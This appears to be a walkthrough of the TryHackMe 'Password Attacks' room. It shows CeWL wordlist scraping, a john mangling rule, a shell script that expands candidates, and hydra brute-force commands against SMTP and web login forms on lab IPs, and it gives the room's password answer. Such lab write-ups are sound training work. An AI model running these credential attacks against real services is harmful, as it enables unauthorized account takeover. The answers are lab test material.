# Password Attacks

**Room Link:** <https://tryhackme.com/room/passwordattacks>

## Deploy the VM

Create a wordlist from the clinic site with CeWL, as recommended in the room. `-m 8` keeps only words of at least eight characters and `-w` writes the result to `clinic.lst`.

**Kali**

```
# Spider the site and keep words of length >= 8 as candidate base words
cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/
```

## Online Attacks

**In this question, you need to generate a rule-based dictionary from the wordlist clinic.lst in the previous task. email: <pittman@clinic.thmredteam.com> against 10.10.131.68:25 (SMTP).**

**What is the password? Note that the password format is as follows: \[symbol]\[dictionary word]\[0-9]\[0-9].**

#### **john.conf**

```
# Add this section to john.conf (or john-local.conf) so --rules=THM-Password-Attacks resolves.
# Az"..." appends the string (the [0-9][0-9] classes expand to 00-99),
# ^[!@#$] prepends one of the four symbols: 400 candidates per word.
[List.Rules:THM-Password-Attacks]
Az"[0-9][0-9]" ^[!@#$]
```

**Kali**

```
VICTIM=10.10.131.68  # SMTP target from the question
john --wordlist=clinic.lst --rules=THM-Password-Attacks --stdout > dict.lst  # expand only, no cracking
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://$VICTIM:25 -v
```
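Before pointing hydra at a live mail server it is worth knowing exactly what the rule above produces and how many attempts that means per account. The following script is an added example, not part of the original writeup: it re-implements the `Az"[0-9][0-9]" ^[!@#$]` rule in POSIX sh/awk (john is not needed) and counts the resulting candidates. The two-word sample wordlist is constructed for the example; the real `clinic.lst` from CeWL is not embedded. John's preprocessor may emit the same candidates in a different order, but the set is identical.

```sh
#!/bin/sh
# Added example (not from the original writeup): reproduce by hand what the
# john rule  Az"[0-9][0-9]" ^[!@#$]  does to each wordlist entry, so the
# candidate format and the size of dict.lst can be checked before hydra
# starts hammering the SMTP service. Pure POSIX sh + awk.

# expand_rule WORD: print every candidate of the form [symbol][WORD][0-9][0-9],
# i.e. 4 symbols x 100 digit pairs = 400 guesses per dictionary word.
expand_rule() {
    awk -v w="$1" 'BEGIN {
        syms = "!@#$"
        for (s = 1; s <= length(syms); s++)
            for (d = 0; d <= 99; d++)
                printf "%s%s%02d\n", substr(syms, s, 1), w, d
    }'
}

# expand_list FILE: apply the rule to every non-empty line of a wordlist
# (the equivalent of: john --wordlist=FILE --rules=THM-Password-Attacks --stdout)
expand_list() {
    while IFS= read -r word || [ -n "$word" ]; do
        [ -n "$word" ] && expand_rule "$word"
    done < "$1"
}

# candidate_count FILE: number of login attempts hydra will make per username
candidate_count() {
    expand_list "$1" | wc -l | tr -d ' '
}

# Constructed two-word stand-in for clinic.lst (the real CeWL output is not embedded)
sample=$(mktemp)
printf 'multidisciplinary\nappointment\n' > "$sample"
echo "candidates per user: $(candidate_count "$sample")"   # 2 words x 400 = 800
expand_list "$sample" | grep -xF '!multidisciplinary00'     # the password found in the room
rm -f "$sample"
```

Multiply the count by the number of usernames and by the service's per-attempt latency to estimate run time; a few hundred words from CeWL already yields well over 100,000 SMTP logins, which is noisy and will show up in the mail server's logs.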

The answer is `!multidisciplinary00`.

**Perform a brute-forcing attack against the phillips account for the login page at <http://10.10.130.199/login-get> using hydra? What is the flag?**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FkP3yVe5gcrm2cQaE6lxC%2Fimage.png?alt=media&#x26;token=8815fdaf-3a82-48ac-833c-a2ac7dae18f8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FYDC32UmISNJQkguogs9E%2Fimage.png?alt=media&#x26;token=3daaa0f3-3ce7-40f9-906d-9fee6007ee3f" alt=""><figcaption></figcaption></figure>

**Kali**

```
# http-get-form "<path>:<params with ^USER^/^PASS^>:S=<string only a successful login returns>"; -f stops at the first hit
hydra -l phillips -P ../dict.lst 10.10.130.199 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fcez1gSY2RC4sS3Xyvjnr%2Fimage.png?alt=media&#x26;token=5bf16c87-14d5-4dce-b718-67e7050e7b6e" alt=""><figcaption></figcaption></figure>

**Perform a rule-based password attack to gain access to the burgess account. Find the flag at the following website: <http://10.10.130.199/login-post/>. What is the flag?**

**Note: use the clinic.lst dictionary in generating and expanding the wordlist!**

**Kali**

```
# Single-Extra is a rule set that ships in john.conf; it expands each word with common mangling (case, digits, symbols)
john --wordlist=clinic.lst --rules=Single-Extra --stdout > dict2.lst

# Same form attack as before, but the login is a POST; S=logout.php is again the success marker
./hydra -l burgess -P dict2.lst 10.10.130.199 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FRJItl2op99RktJ9Tcyid%2Fimage.png?alt=media&#x26;token=4365e8d4-60c6-4bbf-ae53-ca919fa55233" alt=""><figcaption></figcaption></figure>
